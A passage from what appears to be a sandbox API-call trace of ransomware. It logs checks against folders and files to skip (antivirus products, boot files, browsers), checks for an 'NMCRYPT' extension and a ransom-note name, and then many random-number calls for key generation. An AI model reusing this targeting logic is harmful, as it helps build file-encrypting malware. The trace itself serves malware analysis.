Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\java\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\windows\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\ESET\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\AVG\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\AVIRA\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*Atheros*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*Realtek*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*bootmgr*") returned 0 [0158.555] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*boot*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*boot*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*CONFIG.SYS*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*IO.SYS*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*MSDOS.SYS*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*NTDETECT.COM*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*ntldr*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*chrome*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*opera*") returned 0 [0158.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", pszSpec="*firefox*") returned 0 [0158.556] wcslen (_String="\\\\?\\") returned 0x4 [0158.556] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad138 [0158.556] wcscmp (_String1=".", _String2=".") returned 0 [0158.556] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.556] wcscmp (_String1="..", _String2=".") returned 1 [0158.556] wcscmp (_String1="..", _String2="..") returned 0 [0158.556] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*NMCRYPT") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*Recovers your files.html") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.exe") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.dll") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.lnk") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.bat") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.ini") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.msi") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*.scf") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*pagefile.sys*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*NTUSER.DAT*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*AppData*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\winrar\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\java\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\windows\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\ESET\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\AVG\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\AVIRA\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*Atheros*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*Realtek*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*bootmgr*") returned 0 [0158.556] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*boot*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*boot*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*CONFIG.SYS*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*IO.SYS*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*MSDOS.SYS*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*NTDETECT.COM*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*ntldr*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*chrome*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*opera*") returned 0 [0158.557] PathMatchSpecW (pszFile="ea-sym.xml", pszSpec="*firefox*") returned 0 [0158.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", pszSpec="*") returned 1 [0158.557] strlen (_Str="NMoreira") returned 0x8 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.557] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 